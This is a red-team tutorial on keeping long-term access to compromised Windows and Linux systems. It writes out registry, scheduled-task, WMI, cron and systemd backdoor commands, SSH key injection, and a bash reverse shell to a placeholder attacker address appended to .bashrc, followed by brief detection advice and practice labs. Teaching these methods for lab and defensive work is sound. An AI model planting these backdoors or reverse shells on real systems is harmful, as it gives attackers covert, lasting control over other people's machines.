Introduction to Persistence
In the context of offensive security and red teaming, persistence refers to techniques used by attackers to maintain long-term access to compromised systems. After an initial exploitation, maintaining a foothold on the system ensures that the attacker can return later to continue data exfiltration, lateral movement, or control without needing to exploit the system again. Effective persistence is a critical phase in post-exploitation and is often customized to avoid detection by endpoint detection and response (EDR) solutions.
Objectives of Persistence
– Maintain continuous access to the target system.
– Evade detection from antivirus and monitoring tools.
– Enable re-entry without further exploitation.
– Set up covert communication channels.
– Support long-term operations like data exfiltration and reconnaissance.
Windows Persistence Techniques
Windows provides multiple methods to achieve persistence. Attackers often exploit legitimate features such as scheduled tasks and registry entries. Below are some of the most commonly used Windows persistence methods:
1. Registry Run Key:
Command:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d “C:\malware.exe”
2. Scheduled Task:
Command:
schtasks /create /tn “Updater” /tr “C:\backdoor.exe” /sc onlogon /rl highest
3. Windows Management Instrumentation (WMI):
Command (PowerShell):
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name=’LogonTrigger’; EventNamespace=’root\cimv2′; QueryLanguage=’WQL’; Query=”SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA ‘Win32_LocalTime'”}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name=’LogonConsumer’; CommandLineTemplate=’C:\malware.exe’}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
4. Startup Folder:
Command:
copy C:\backdoor.exe “C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
5. DLL Hijacking:
Technique:
Place a malicious DLL in a directory where a vulnerable application loads it instead of the legitimate one.
Linux Persistence Techniques
Linux systems also offer multiple avenues for attackers to establish persistence. Methods often include modifying user profile scripts or leveraging cron jobs.
1. Cron Jobs:
Command:
(crontab -l 2>/dev/null; echo “@reboot /home/user/backdoor.sh”) | crontab –
2. .bashrc File:
Command:
echo “bash -i >& /dev/tcp/attacker-ip/4444 0>&1” >> ~/.bashrc
3. Systemd Service:
Commands:
nano /etc/systemd/system/persistence.service
[Unit]
Description=Persistence Backdoor
[Service]
ExecStart=/bin/bash /root/backdoor.sh
[Install]
WantedBy=multi-user.target
Then:
systemctl daemon-reexec
systemctl enable persistence
systemctl start persistence
4. SSH Key Injection:
Command:
echo “<attacker-public-key>” >> ~/.ssh/authorized_keys
Cross-Platform Techniques
1. Reverse Shell via Startup Script:
– Linux: echo “bash -i >& /dev/tcp/attacker-ip/4444 0>&1” >> ~/.bashrc
– Windows: Create a PowerShell reverse shell batch file in the Startup folder
2. Malicious Browser Extension:
Technique: Use a fake browser extension that exfiltrates data or opens a C2 channel. Often delivered via phishing.
3. Cloud Persistence:
Technique: Abuse OAuth tokens, API keys, or misconfigured access policies in cloud services (e.g., Google Workspace, Office 365).
Persistence via Tools
– Metasploit: use post/windows/manage/persistence
– Empire: Use ‘persistence’ module
– Nishang: PowerShell-based persistence scripts
– Evil-WinRM: Used to maintain shell access on Windows targets
– SharpPersist: Automates registry, WMI, and other methods
Detection and Defense
– Use Autoruns or Sysinternals to detect abnormal startup items.
– Monitor for unauthorized crontab or systemd changes in Linux.
– Review WMI filters and consumers for unexpected entries.
– Scan startup folders and PowerShell histories.
– Audit cloud access logs and app permissions regularly.
Conclusion
Persistence is a vital stage in red teaming and offensive security. Mastery of multiple techniques and their stealthy implementations ensures successful long-term access to targets. Always test persistence in a controlled lab and document the methods for blue teams to enhance defensive strategies.
Labs for Practice
– TryHackMe: ‘Windows Persistence’, ‘Linux PrivEsc’
– HackTheBox: ‘Registry’, ‘Cronos’, and others
– Local VirtualBox or VMWare lab environments
